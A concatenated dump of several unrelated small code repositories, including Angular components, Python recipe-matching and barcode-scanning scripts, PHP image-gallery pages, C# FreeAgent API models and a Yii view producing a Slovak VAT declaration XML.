// Every Angular template is first compiled by the browser before Angular runs it's compiler
templateUrl: './home.component.html'
})
export class HomeComponent implements OnInit {
// TypeScript public modifiers
constructor(
) { }
public ngOnInit() {
}
public submitState(value: string) {
}
}
<file_sep>import {
Component,
OnInit
} from '@angular/core';
@Component({
selector: 'layout-main',
templateUrl: './layout-main.component.html'
})
export class LayoutMainComponent implements OnInit {
// TypeScript public modifiers
constructor(
) { }
public ngOnInit() {
//console.log('hello `Home` component');
// this.title.getData().subscribe(data => this.data = data);
}
}
<file_sep>import { Component, OnInit, Input } from '@angular/core';
import { NgbActiveModal } from '@ng-bootstrap/ng-bootstrap';
@Component({
selector: 'sample-modal-content',
templateUrl: './sample-modal-content.component.html',
})
export class SampleModalContentComponent implements OnInit {
error: boolean | string;
constructor(public activeModal: NgbActiveModal) { }
ngOnInit() {}
handleSubmit() {
this.error = false;
// do some http | async stuff
// pass in boolean to test
this.sampleAsync().then((res) => {
// Successful
this.activeModal.close(res);
}, (res) => {
// Error
this.error = res;
});
}
sampleAsync(result:boolean = true) {
return new Promise((resolve, reject) => {
setTimeout(() => {
if(result) {
resolve('Request was Successful');
} else {
reject('Request Failed');
}
}, 1000)
})
}
}
<file_sep>export * from './scaffolding.component';<file_sep>import { Routes, RouterModule } from '@angular/router';
//Routable components
import { LayoutMainComponent } from './components/masterpage/layout-main';
import { NoContentComponent } from './components/routes/no-content';
import { HomeComponent } from './components/routes/home';
import { ScaffoldingComponent } from './components/routes/scaffolding';
import { DataResolver } from './app.resolver';
export const ROUTES: Routes = [
{
path: '', component: LayoutMainComponent,
children: [
{ path: '', component: HomeComponent },
{ path: 'scaffolding', component: ScaffoldingComponent },
{ path: '**', component: NoContentComponent }
]
}
]; <file_sep>import {Component, OnInit} from '@angular/core';
@Component({
selector: 'nav-main',
templateUrl: './nav-main.component.html'
})
export class NavMainComponent implements OnInit {
constructor(
) {
}
public ngOnInit() {
}
}
<file_sep>export * from './button-modal.component'; | 82b06664806299072d6389bf1a67c9e76105bfb6 | [
"TypeScript"
] | 12 | TypeScript | JerrolKrause/angular2-seed | 32f7332e6218b39dc96af7a18f1cd538b38a922f | 99011d8e842119e6760af3c37a9dacf3b7002ebd |
refs/heads/master | <file_sep>""" This program simulates a SQL database to test our recipe suggestion algorithm"""
import numpy as np
import base64
import psycopg2
# table of recipes.
# ID ingredients amounts
#recipes = np.asarray([[[1], [2,5,8,4], [4,2,6,3]],
# [[2], [5,7,1,2], [8,9,3,4]],
# [[3], [6,7,3], [6,9,8]],
# [[4], [2,5,8,9,3], [4,5,6,3,2]]])
#table of available ingredients
# ID amount
#ingredients = np.asarray([[1, 4],
# [2, 5],
# [3, 1],
# [4, 4],
# [5, 8],
# [6, 6],
# [7, 7],
# [8, 2],
# [9, 5]])
max_recipes = np.asarray([0,0,0,0,0]) #IDs of max overlap recipes
max_overlap = np.asarray([0,0,0,0,0])
#Get ingredient IDs from SQL as numpy array
#I = ingredients[:,0] # array of ingredient IDs
conn = psycopg2.connect('dbname=grocery_guard')
cur = conn.cursor()
cur.execute("select id from fridge")
I = np.asarray(cur.fetchall())
cur.execute("select id from recipes")
recipes = np.asarray(cur.fetchall())
#j=0
#get max recipe ID to use as loop control
cur.execute("select id from recipes where id = (select max(id) from recipes)")
num_recs = int(cur.fetchone()[0])
print "number of recipes: ", num_recs
#print 'r',max_recipes,'o', max_overlap
#print "---------------------------------------"
#Get list of recipe IDs from SQL
for r in range(1,num_recs+1):
#get row for recipe ID r from SQL as numpy array
cur.execute("select ingredients from recipes where id = %s" % str(r))
ri = np.asarray(cur.fetchone())[0] #ingredients for recipe r
cur.execute("select amounts from recipes where id = %s" % str(r))
ra = np.asarray(cur.fetchone())[0] #amounts for recipe r
#ri =np.asarray(recipes[j][1]) # r's ingredients
s = np.intersect1d(ri,I)
n = s.size
#print "ingredients ", I
#print "required ", ri
#print "difference ", I-ri
#print "overlap ", n
for i in s:
indr = np.where(ri==i)[0][0] # index of i in r's ingredient list
#indi = np.where(ingredients[:,0]==i)[0][0]
#cur.execute("select id from fridge where id = %s" % str(i))
#indi = int(cur.fetchone()[0])
#Get Ingredient row for ID indi from SQL as numpy array
cur.execute("select quantity from fridge where id = %s" % str(i))
tmp = cur.fetchone()[0]
if tmp < ra[indr] : #amount of ingredient i
print "subtracted ", r
n-=1
#n+=1
# print 'recipe: ',r[0]
# print indi, indr
#print "recipe: " + str(r), "overlap: ", n
m = np.min(max_overlap)
n = float(n)/ra.shape[0] #convert to percentage
if n > m:
#print "m: ",m, "n: ",n
ind = np.where(max_overlap==m)[0][0]
#print ind
max_overlap = np.delete(max_overlap,ind)
max_overlap = np.append(max_overlap,n)
max_recipes = np.delete(max_recipes,ind)
max_recipes = np.append(max_recipes,r)
#print 'r',max_recipes
#print 'o', max_overlap
#j+=1
print 'recipes: ',max_recipes
print 'sizes: ',max_overlap
<file_sep># Test for zbar-py using a webcam
# Written by <NAME> (<EMAIL>)
# Tested with linux
#
# Required: pygame
#
# Instructions:
# 1) Set the cam source '/dev/video0'
# 2) Get a pic. If pic doesnot look good, then press enter at terminal.
# Camera will take another pic. When done press q and enter to quit camera mode
# 3) You will get reading on the terminal
#
import zbar
import zbar.misc
import numpy as np
import picamera
import picamera.array
import time
import pygame
import pygame.camera
import pygame.image
import pygame.surfarray
from PIL import Image
import sys
def get_image_array_from_webcam(cam_name,cam_resolution):
"""Get an image ndarray from webcam using pygame."""
pygame.init()
pygame.camera.init()
pygame.camera.list_cameras()
cam = pygame.camera.Camera(cam_name, cam_resolution,'RGB')
#print cam
screen = pygame.display.set_mode(cam.get_size())
print('Get a pic of barcode. If pic doesnot look good, then press enter at terminal. \
Camera will take another pic. When done press q and enter to quit camera mode')
while True:
cam.start()
time.sleep(0.5) # You might need something higher in the beginning
pygame_screen_image = cam.get_image()
screen.blit(pygame_screen_image, (0,0))
pygame.display.flip() # update the display
cam.stop()
if raw_input() == "q":
break
pygame.display.quit()
image_ndarray = pygame.surfarray.array3d(pygame_screen_image)
img_arr = np.dot(image_ndarray[...,:3], [0.299, 0.587, 0.114])
img_arr=img_arr.astype(np.uint8)
return img_arr
def main_webcam():
    """Grab one frame from the USB webcam and print any decoded barcodes."""
    #----------------------------------------------------------------------------------
    # Get the pic
    # To get pic from cam or video, packages like opencv or simplecv can also be used.
    #----------------------------------------------------------------------------------
    # Cam name might vary depending on your PC.
    cam_name='/dev/video0'
    cam_resolution=(640,480) # A general cam resolution
    img_ndarray = get_image_array_from_webcam(cam_name, cam_resolution)
    #-------------------------------------------------------------------------
    # Read the Barcode
    #-------------------------------------------------------------------------
    # Detect all
    scanner = zbar.Scanner()
    results = scanner.scan(img_ndarray)
    if results==[]:
        print("No Barcode found.")
    else:
        for result in results:
            # By default zbar returns barcode data as byte array, so decode byte array as ascii
            print(result.type, result.data.decode("ascii"), result.quality)
def get_image_array_from_picam(cam_resolution):
"""get an image array from the picamera"""
with picamera.PiCamera() as camera:
with picamera.array.PiRGBArray(camera) as output:
camera.resolution = cam_resolution
camera.capture(output,'rgb')
image_ndarrayRGB = output.array
print type(output)
print output.array.shape
if len(image_ndarrayRGB.shape) == 3:
image_ndarray = zbar.misc.rgb2gray(image_ndarrayRGB)
camera.close()
return image_ndarray, image_ndarrayRGB
def main_picam():
    """Scan barcodes with the Pi camera in a loop: capture, decode, show the
    frame, wait for Enter, repeat (runs until the process is killed)."""
    #----------------------------------------------------------------------------------
    # Get the pic
    # To get pic from cam or video, packages like opencv or simplecv can also be used.
    #----------------------------------------------------------------------------------
    # Cam name might vary depending on your PC.
    #cam_name='/dev/video1'
    cam_resolution=(640,480) # A general cam resolution
    results = []
    while results == []:
        img_ndarray, img_ndarrayRGB = get_image_array_from_picam(cam_resolution)
        #-------------------------------------------------------------------------
        # Read the Barcode
        #-------------------------------------------------------------------------
        # Detect all
        scanner = zbar.Scanner()
        results = scanner.scan(img_ndarray)
        if results==[]:
            print("No Barcode found.")
        else:
            for result in results:
                # By default zbar returns barcode data as byte array, so decode byte array as ascii
                print(result.type, result.data.decode("ascii"), result.quality)
        img = Image.fromarray(img_ndarrayRGB, 'RGB')
        img.show()
        #time.sleep(1)
        raw_input('Enter')
        # Reset so the while condition holds and scanning continues.
        results = []
if __name__ == "__main__":
    # "picam"/"picamera"/"p" selects the Raspberry Pi camera path;
    # anything else (or no argument) uses the USB webcam via pygame.
    if len(sys.argv) > 1 and (sys.argv[1] in ["picam","picamera","p"]):
        #print "picamera accessed"
        main_picam()
    else:
        main_webcam()
<file_sep>""" This program simulates a SQL database to test our recipe suggestion algorithm"""
import numpy as np
import base64
import psycopg2
# table of recipes.
# ID ingredients amounts
recipes = np.asarray([[[1], [1,2,3,4,5], [1,1,1,1,1]],
[[2], [5,7,1,2], [1,9,3,4]],
[[3], [6,7,3], [1,1,1]],
[[4], [2,5,8,9,3], [4,5,6,3,2]],
[[5], [1,2,3,4,5], [1,1,1,1,2]],
[[6], [1,2,3], [1,1,1]]])
#table of available ingredients
# ID amount
ingredients = np.asarray([[1, 1],
[2, 1],
[3, 1],
[4, 1],
[5, 1],
[6, 1],
[7, 1],
[8, 1],
[9, 1]])
max_recipes = np.asarray([-3,-2,-1,0]) #IDs of max overlap recipes
max_overlap = np.asarray([-3,-2,-1,0])
#Get ingredient IDs from SQL as numpy array
I = ingredients[:,0] # array of ingredient IDs
#conn = psycopg2.connect('dbname=grocery_guard')
#cur = conn.cursor()
#cur.execute("select id from fridge")
#I = np.asarray(cur.fetchall())
#cur.execute("select (id,ingredients,amounts) from recipes")
#recipes = np.asarray(cur.fetchall())
j=0
#Get list of recipe IDs from SQL
for r in recipes:
#get row for recipe ID r from SQL as numpy array
ri =np.asarray(recipes[j][1])
print "ri: ",ri
s = np.intersect1d(ri,I)
print "s: ",s
n = s.size
print "n: ",n
for i in s:
indr = np.where(r[1]==i)[0][0] # index of i in r's ingredient list
indi = np.where(ingredients[:,0]==i)[0][0]
#Get Ingredient row for ID indi from SQL as numpy array
if ingredients[indi,1] < r[2][indr] : #amount of ingredient i
n-=1
#n+=1
# print 'recipe: ',r[0]
# print indi, indr
m = np.min(max_overlap)
#print 'ind: ',ind
print 'recipes: ',max_recipes
print 'size: ',max_overlap
#print 'indi: ',indi
#print "m: ",m
#print "n: ",n
if n > m:
m = np.min(max_overlap)
ind = (np.where(max_overlap)==m)
#inds = (np.where(max_overlap)==m)
print 'ind: ',ind
max_overlap = np.delete(max_overlap,ind==True)
max_overlap = np.append(max_overlap,n)
max_recipes = np.delete(max_recipes,ind==True)
max_recipes = np.append(max_recipes,r[0])
j+=1
print 'recipes: ',max_recipes
print 'sizes: ',max_overlap
<file_sep>with open('chicken_parm.txt') as fin:
    f = fin.readlines()  # all lines of the sample recipe file, newlines kept
    print f  # Python 2 print of the raw list (debug/demo output)
<file_sep># Test for zbar-py using a webcam
# Written by <NAME> (<EMAIL>)
# Tested with linux
#
# Required: pygame
#
# Instructions:
# 1) Set the cam source '/dev/video0'
# 2) Get a pic. If pic doesnot look good, then press enter at terminal.
# Camera will take another pic. When done press q and enter to quit camera mode
# 3) You will get reading on the terminal
#
import zbar
import zbar.misc
import numpy as np
import picamera
import picamera.array
import time
import pygame
import pygame.camera
import pygame.image
import pygame.surfarray
from PIL import Image
def get_image_array_from_cam(cam_resolution):
'''Get animage ndarray from webcam using pygame.'''
"""
pygame.init()
pygame.camera.init()
pygame.camera.list_cameras()
cam = pygame.camera.Camera(cam_name, cam_resolution,'RGB')
#print cam
screen = pygame.display.set_mode(cam.get_size())
print('Get a pic of barcode. If pic doesnot look good, then press enter at terminal. \
Camera will take another pic. When done press q and enter to quit camera mode')
while True:
cam.start()
time.sleep(0.5) # You might need something higher in the beginning
pygame_screen_image = cam.get_image()
screen.blit(pygame_screen_image, (0,0))
pygame.display.flip() # update the display
cam.stop()
if raw_input() == "q":
break
pygame.display.quit()
image_ndarray = pygame.surfarray.array3d(pygame_screen_image)
"""
with picamera.PiCamera() as camera:
with picamera.array.PiRGBArray(camera) as output:
camera.resolution = cam_resolution
camera.capture(output,'rgb')
image_ndarrayRGB = output.array
print type(output)
print output.array.shape
if len(image_ndarrayRGB.shape) == 3:
image_ndarray = zbar.misc.rgb2gray(image_ndarrayRGB)
camera.close()
return image_ndarray, image_ndarrayRGB
#----------------------------------------------------------------------------------
# Get the pic
# To get pic from cam or video, packages like opencv or simplecv can also be used.
#----------------------------------------------------------------------------------
# Cam name might vary depending on your PC.
#cam_name='/dev/video1'
cam_resolution=(640,480) # A general cam resolution
results = []
# Main scan loop: capture, decode, display, wait for Enter, repeat.
# results is reset at the bottom, so this runs until the process is killed.
while results == []:
    img_ndarray, img_ndarrayRGB = get_image_array_from_cam(cam_resolution)
    #-------------------------------------------------------------------------
    # Read the Barcode
    #-------------------------------------------------------------------------
    # Detect all
    scanner = zbar.Scanner()
    results = scanner.scan(img_ndarray)
    if results==[]:
        print("No Barcode found.")
    else:
        for result in results:
            # By default zbar returns barcode data as byte array, so decode byte array as ascii
            print(result.type, result.data.decode("ascii"), result.quality)
    img = Image.fromarray(img_ndarrayRGB, 'RGB')
    img.show()
    #time.sleep(1)
    raw_input('Enter')
    results = []
<file_sep>from num2words import num2words
from subprocess import call
# Shell fragments: espeak renders the text to Text.wav (--stdout redirect),
# which is then played with aplay; stderr is silenced.
cmd_beg = 'espeak '
cmd_end = ' | aplay /home/pi/GroceryGuard/Text.wav 2>/dev/null'
cmd_out = '--stdout > /home/pi/GroceryGuard/Text.wav '
text=raw_input(" ENter text: ")
print(text)
# Underscores keep the multi-word text as a single espeak argument.
text=text.replace(' ','_')
# NOTE(review): num2words is imported at the top of this file but unused here.
call([cmd_beg+cmd_out+text+cmd_end], shell=True)
<file_sep>import sys
import base64
import psycopg2
def main(recipe):
with open(recipe + '.txt') as fin:
print 'reading txt'
lines = fin.readlines()
ID,name,ingredients,amounts = lines[0][:-1].split(';')
lines = lines[1:]
instructions = ''
for line in lines:
instructions = instructions + line
with open(recipe + '.jpg') as fin:
print 'reading image'
image = base64.b64encode(fin.read())
write_to_db(ID,name,ingredients,amounts,instructions,image)
def write_to_db(ID, name, ingredients, amounts, instructions, image):
    """Insert one recipe row into the grocery_guard database.

    `image` is a base64-encoded JPEG; it is decoded server-side so the
    stored value is the raw bytes, exactly as before.
    """
    print('db')
    conn = psycopg2.connect('dbname=grocery_guard')
    print('connected')
    cur = conn.cursor()
    try:
        # Bug/security fix: the old string-formatted SQL broke on any value
        # containing a quote and was open to SQL injection; use a
        # parameterized query instead (psycopg2 handles all escaping).
        cur.execute(
            "insert into recipes values (%s,%s,%s,%s,%s,decode(%s,'base64'))",
            (ID, name, ingredients, amounts, instructions, image))
    except Exception as e:
        # Best-effort logging, as before (pgerror is set on psycopg2 errors).
        print(e.pgerror)
    conn.commit()
    conn.close()
if __name__ == "__main__":
    # Usage: python <script> <recipe-basename>
    # Silently does nothing when no recipe name is supplied.
    if len(sys.argv)<2:
        pass
    else:
        print 'main'
        main(sys.argv[1])
<file_sep>from num2words import num2words
from subprocess import call
# espeak invocation fragments; stderr is silenced.
cmd_beg = 'espeak '
cmd_end = ' 2>/dev/null'
x= int(raw_input("Enter a no. "))
count =" Count down starts"
print(count)
count= count.replace(' ', '_') #To identify words in the text entered
call([cmd_beg+count+cmd_end], shell=True)
# Speak and print every number from x down to 0 inclusive.
for i in range(x,-1,-1):
    cmd=num2words(i)
    print(i)
    call([cmd_beg+cmd+cmd_end], shell=True)
| 9aa91ab1c73bb624c6167d3b825cc0c44656a584 | [
"Python"
] | 8 | Python | cjs342/GroceryGuard | 1994cd14f9323d8afe62572029b3877221a40a8e | cc4b04f45a33c6c2fa58992a8c1ec54d07f9c95c |
refs/heads/master | <file_sep><!doctype html>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="<NAME>">
<title>New Art Production</title>
<link href="css/bootstrap.css" rel="stylesheet">
<link href="css/style.css" rel="stylesheet">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="js/bootstrap.min.js"></script>
</head>
<body>
<?php
// Shared PDO connection used by the image grid below.
// NOTE(review): credentials are hard-coded here; move them to a config file.
try {
    $dbconn = new PDO('mysql:host=127.0.0.1;port=3306;dbname=newart_prova', 'root', 'beppe');
    $dbconn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
} catch (PDOException $e) {
    // Robustness fix: the exception was silently swallowed, leaving $dbconn
    // undefined and causing a fatal "call on null" at prepare() further down.
    exit('Database connection failed.');
}
?>
<!-- navbar -->
<nav class="homenav navbar navbar-inverse navbar-static-top ">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar3">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="http://disputebills.com">
<img class="img-responsive hidden-xs" src="img/logo_rett.jpg" alt="New Art Productions">
<img class="img-responsive hidden-sm hidden-md hidden-lg" src="img/logo_quadrato.jpg" alt="New Art Productions">
</a>
</div>
<div id="navbar3" class="navbar-collapse collapse">
<ul class="nav navbar-nav navbar-right">
<li ><a href="index.php">Home</a></li>
<li><a href="#">Chi siamo</a></li>
<li class="dropdown">
<a href="categories.php" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-expanded="false">Prodotti <span class="caret"></span></a>
<ul class="dropdown-menu" role="menu">
<li><a href="products.php">Tele</a></li>
<li><a href="products.php">Specchiere</a></li>
<li><a href="products.php">Orologi</a></li>
<!--<li class="divider"></li>
<li class="dropdown-header">Nav header</li>
<li><a href="#">Separated link</a></li>
<li><a href="#">One more separated link</a></li>-->
</ul>
</li>
<li><a href="about.php">Contatti</a></li>
</ul>
</div>
<!--/.nav-collapse -->
</div>
<!--/.container-fluid -->
</nav>
<!-- end navbar -->
<!-- content -->
<div class="container-fluid">
<div class="hidden-xs col-sm-3">
<div class="panel panel-default">
<div class="panel-heading">
<h3 class="panel-title">Panel title</h3>
</div>
<div class="panel-body">
Panel content
</div>
</div>
</div>
<nav class="navbar navbar-inverse navbar-collapse hidden-sm hidden-md hidden-lg">
<div class="container-fliud">
</div>
</nav>
<div class="col-xs-12 col-sm-9">
<?php
// Render one responsive card per image link stored in the Immagini table.
// NOTE(review): LinkImmagine is echoed into an attribute without
// htmlspecialchars(); if the stored value can contain quotes/HTML it
// should be escaped -- verify against how the table is populated.
$statement = $dbconn->prepare('SELECT LinkImmagine FROM Immagini');
$statement->execute();
while ($record = $statement->fetch(PDO::FETCH_ASSOC)) {
?>
<div class="col-xs-12 col-sm-6 col-md-4">
<div class="panel panel-default">
<div class="panel-body">
<img src="<?php echo $record['LinkImmagine']; ?>" class="img-responsive">
</div>
</div>
</div>
<?php
}
?>
</div>
</div>
<!-- end content -->
<!-- footer -->
<footer class="footer">
<div class="container text-center">
<span class="text-muted">New Art Production Srl Via Brunacci, 5 - 30175 Marghera (VE) - Tel (+39) 041 936899 - Fax (+39) 041 5380877 - CF e P.Iva 03078210279</span>
</div>
</footer>
<!-- end footer -->
</body>
</html><file_sep><!doctype html>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="<NAME>">
<title>New Art Production</title>
<link href="css/bootstrap.css" rel="stylesheet">
<link href="css/style.css" rel="stylesheet">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="js/bootstrap.min.js"></script>
</head>
<body>
<?php
// Connect to the catalogue DB and emit one <img> per stored image link.
// NOTE(review): credentials are hard-coded; move them to a config file.
try {
    $dbconn = new PDO('mysql:host=127.0.0.1;port=3306;dbname=newart_prova', 'root', 'beppe');
    $dbconn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
} catch (PDOException $e) {
    // Robustness fix: the exception was silently swallowed, leaving $dbconn
    // undefined and fataling at prepare() below; fail fast instead.
    exit('Database connection failed.');
}
$statement = $dbconn->prepare('SELECT LinkImmagine FROM Immagini');
$statement->execute();
while ($record = $statement->fetch(PDO::FETCH_ASSOC)) {?>
<img src="<?php echo $record['LinkImmagine']; ?>">
<?php
}
?>
</body>
</html> | a30ae97e0100c3f00cf608d1e6502c62cfa38d30 | [
"PHP"
] | 2 | PHP | IoSonoIlBeppe/SitoNewArt | 022f52ce80f9b0e4b0be323828dbc6c0828b6ab8 | 81cb4903822cf80478006e5252c6b512a2a1132f |
refs/heads/master | <file_sep>import os
# Hide the secret files, stage everything, commit with a user-supplied
# message, and push to origin/master.
os.system('git secret add 1.py 2.py && git secret hide -d ')
os.system('git add . ')
# Bug fix: the original assigned the prompt text to msg (never reading user
# input) and then committed the literal string 'msg'. Read the message and
# interpolate it, with double quotes escaped for the shell.
msg = raw_input('Enter Commit Message: ')
os.system('git commit -m "%s"' % msg.replace('"', r'\"'))
os.system("git push -u origin master")
<file_sep>import getpass
import os

# Prompt without echoing the password to the terminal.
p = getpass.getpass(prompt='Enter Password ')
# NOTE(review): '<PASSWORD>89' looks like a redacted placeholder; as written
# p.lower() can never equal a string containing uppercase letters -- verify.
if p.lower() == '<PASSWORD>89':
    # Bug fix: the original passed the literal character 'p' to git-secret
    # instead of the entered password; interpolate the real value.
    os.system("git secret reveal -p '%s'" % p)
else:
    print('Incorrect Password')
| af33071e56d013baebc5e5d5b0916f447ef57434 | [
"Python"
] | 2 | Python | hareesh309/JavaWebApp | 09c58ef038410462935382d4eef2a62d2ba0647b | 141c93490421a0dd0dfac5bd4a8a401409f024a6 |
refs/heads/master | <file_sep>import java.util.Scanner;
public class ConvertMileToKilometer {
public static void main(String[] args) {
// Create a scanner (variable) for miles
Scanner input = new Scanner(System.in);
System.out.print("Enter number of miles: ");
double mile = input.nextDouble();
// Convert miles to kilometers
double unargumentedKilometers = mile * 1.6;
// double var1 = unargumentedKilometers * 100;
// double intermediaryKilometers2 = (int) intermediaryKilometers1 / 10;
//Short the kilometers number so that it only figures with 2 decimals
//First eliminate all decimals after the second one
double var3 = unargumentedKilometers % 1;
double var4 = var3 * 100;
double var5 = (int)var4;
double var6 = var5 / 100;
//Second: we now cut the unargumented kilometers number so that only the part before the digits are counting
double var7 = (int)unargumentedKilometers;
//Third: Now we couple the cutnumber of the kilometers with the 2 decimals so that we get the kilometerconversio with 2 decimals
double argumentedKilometers = var7 + var6;
// double roundOffKilometers = (int)kilometers;
// System output kilometers
// System.out.print("kilometers traversed is:" + roundOffKilometers + "km");
System.out.print("kilometers traversed is: " + argumentedKilometers + "km");
}
} | bb72b7333e6b4a8937cde28eac9f09363ff2fcf0 | [
"Java"
] | 1 | Java | KristianWB/ItJP_Excercise_2_1 | 8ddabd4c04f0fe81392cc5be1916331ce642f241 | 59e3b9bb3e9f3b3db96cea79380b610ef72d494a |
refs/heads/master | <repo_name>mattwoberts/FreeAgent<file_sep>/FreeAgent/Models/BankTransaction.cs
using System.Collections.Generic;
namespace FreeAgent
{
    /// <summary>
    /// A single bank transaction record. Property names are snake_case --
    /// presumably mirroring the FreeAgent API's JSON keys (verify against
    /// the serializer configuration).
    /// </summary>
    public class BankTransaction : UpdatableModel
    {
        public string bank_account { get; set; }
        public double amount { get; set; }
        public string dated_on { get; set; }
        public string description { get; set; }
        public double unexplained_amount { get; set; }
        public bool is_manual { get; set; }
    }

    /// <summary>Envelope for a single-transaction API payload.</summary>
    public class BankTransactionWrapper
    {
        public BankTransactionWrapper()
        {
            bank_transaction = null;
        }
        public BankTransaction bank_transaction { get; set; }
    }

    /// <summary>Envelope for a transaction-list API payload.</summary>
    public class BankTransactionsWrapper
    {
        public BankTransactionsWrapper()
        {
            bank_transactions = new List<BankTransaction>();
        }
        public List<BankTransaction> bank_transactions { get; set; }
    }
}<file_sep>/FreeAgent/Models/BankTransactionExplanation.cs
using System.Collections.Generic;
namespace FreeAgent
{
    /// <summary>
    /// Explanation (categorisation) attached to a bank transaction.
    /// TODO: Attachments
    /// </summary>
    public class BankTransactionExplanation : UpdatableModel
    {
        public string bank_account { get; set; }
        public string bank_transaction{ get; set; }
        public double manual_sales_tax_amount { get; set; }
        public string dated_on { get; set; }
        public string description { get; set; }
        public double gross_value { get; set; }
        public double foreign_currency_value { get; set; }
        public string paid_invoice { get; set; }
        public string paid_bill { get; set; }
        public string paid_user { get; set; }
        // public string transfer_bank_account { get; set; }
        public int asset_life_years { get; set; }
    }

    /// <summary>Envelope for a single-explanation API payload.</summary>
    public class BankTransactionExplanationWrapper
    {
        public BankTransactionExplanationWrapper()
        {
            bank_transaction_explanation = null;
        }
        public BankTransactionExplanation bank_transaction_explanation { get; set; }
    }

    /// <summary>Envelope for an explanation-list API payload.</summary>
    public class BankTransactionExplanationsWrapper
    {
        public BankTransactionExplanationsWrapper()
        {
            bank_transaction_explanations = new List<BankTransactionExplanation>();
        }
        public List<BankTransactionExplanation> bank_transaction_explanations { get; set; }
    }
}<file_sep>/FreeAgent/Models/BankAccounts.cs
using System;
using System.Collections.Generic;
namespace FreeAgent
{
    //GET https://api.freeagent.com/v2/bank_accounts
    //https://api.freeagent.com/v2/bank_accounts
    /// <summary>
    /// A bank account; some fields only apply to one account type
    /// (see BankAccountType below).
    /// </summary>
    public class BankAccount : UpdatableModel, IRemoveUrlOnSerialization
    {
        public double opening_balance { get; set; }
        public string type { get; set; }
        public string name { get; set; }
        public bool is_personal { get; set; }
        public string bank_name { get; set; }
        public string currency { get; set; }
        //for standard ones - account_number also on CC
        public string account_number { get; set; }
        public string sort_code { get; set; }
        public string secondary_sort_code { get; set; }
        public string iban { get; set; }
        public string bic { get; set; }
        //for paypal
        public string email { get; set; }
        public double current_balance { get; set; }
    }

    /// <summary>Envelope for a single-account API payload.</summary>
    public class BankAccountWrapper
    {
        public BankAccountWrapper()
        {
            bank_account = null;
        }
        public BankAccount bank_account { get; set; }
    }

    /// <summary>Envelope for an account-list API payload.</summary>
    public class BankAccountsWrapper
    {
        public BankAccountsWrapper()
        {
            bank_accounts = new List<BankAccount>();
        }
        public List<BankAccount> bank_accounts { get; set; }
    }

    /// <summary>String constants for the BankAccount.type field.</summary>
    public class BankAccountType
    {
        public static string StandardBankAccount = "StandardBankAccount";
        public static string PaypalAccount = "PaypalAccount";
        public static string CreditCardAccount = "CreditCardAccount";
    }
}
| 8ebe4f4e2198666c55ade792471e64830b4a58b2 | [
"C#"
] | 3 | C# | mattwoberts/FreeAgent | 453e436c72f69925139d78d908e558af172cd5ca | 65cdaab88b6eaa2f46f0d14a4ba9cc412c5025be |
refs/heads/master | <repo_name>sutulustus/vat_statement_generator<file_sep>/views/site/vat_declaration.php
<?php /* Yii view: Slovak quarterly VAT declaration ("riadne DP") XML.
Expects: $quarter (Roman numeral), $year, $base, $vat, $debits; nf() is a
number-formatting helper defined elsewhere in the app. Taxpayer identity
fields are hard-coded. Rows: r03/r04 output base+VAT, r19 total output VAT,
r21/r23 deductible VAT, r31/r34 resulting VAT payable. The closing "? >"
above eats the following newline, so the emitted file still starts with
the XML declaration. */ ?>
<?xml version="1.0" encoding="utf-8"?>
<dokument>
<hlavicka>
<identifikacneCislo>
<kodStatu>SK</kodStatu>
<cislo>1082215475</cislo>
</identifikacneCislo>
<dic></dic>
<danovyUrad>Banská Bystrica</danovyUrad>
<nevzniklaPov>0</nevzniklaPov>
<typDP>
<rdp>1</rdp>
<odp>0</odp>
<ddp>0</ddp>
<datumZisteniaDdp></datumZisteniaDdp>
</typDP>
<osoba>
<platitel>1</platitel>
<registrovana>0</registrovana>
<inaPovinna>0</inaPovinna>
<zdanitelna>0</zdanitelna>
<zastupca>0</zastupca>
</osoba>
<zdanObd>
<mesiac></mesiac>
<stvrtrok><?= $quarter ?></stvrtrok>
<rok><?= $year ?></rok>
</zdanObd>
<meno>
<riadok><NAME></riadok>
<riadok></riadok>
<riadok></riadok>
</meno>
<adresa>
<ulica>Javornícka</ulica>
<cislo>6169/31</cislo>
<psc>97411</psc>
<obec>Banská Bystrica I</obec>
<tel>
<predcislie></predcislie>
<cislo></cislo>
</tel>
<fax>
<predcislie></predcislie>
<cislo></cislo>
</fax>
</adresa>
<opravnenaOsoba>
<menoPriezvisko></menoPriezvisko>
<tel>
<predcislie></predcislie>
<cislo></cislo>
</tel>
</opravnenaOsoba>
<datumVyhlasenia><?= date('d.m.Y') ?></datumVyhlasenia>
</hlavicka>
<telo>
<r01></r01>
<r02></r02>
<r03><?= nf($base) ?></r03>
<r04><?= nf($vat) ?></r04>
<r05></r05>
<r06></r06>
<r07></r07>
<r08></r08>
<r09></r09>
<r10></r10>
<r11></r11>
<r12></r12>
<r13></r13>
<r14></r14>
<r15></r15>
<r16></r16>
<r17></r17>
<r18></r18>
<r19><?= nf($vat) ?></r19>
<r20></r20>
<r21><?= nf($debits) ?></r21>
<r22></r22>
<r23><?= nf($debits) ?></r23>
<r24></r24>
<r25></r25>
<r26></r26>
<r27></r27>
<r28></r28>
<r29></r29>
<r30></r30>
<r31><?= nf($vat - $debits) ?></r31>
<splneniePodmienok>0</splneniePodmienok>
<r32></r32>
<r33></r33>
<r34><?= nf($vat - $debits) ?></r34>
<r35></r35>
<r36></r36>
<r37></r37>
<r38></r38>
</telo>
</dokument>
<file_sep>/controllers/SiteController.php
<?php
namespace app\controllers;
use Yii;
use yii\web\Controller;
/**
 * VAT statement generator: parses the CSV exports in input/, shows them
 * for review, and writes the Slovak VAT control statement and VAT
 * declaration XML files to output/.
 */
class SiteController extends Controller
{
    /**
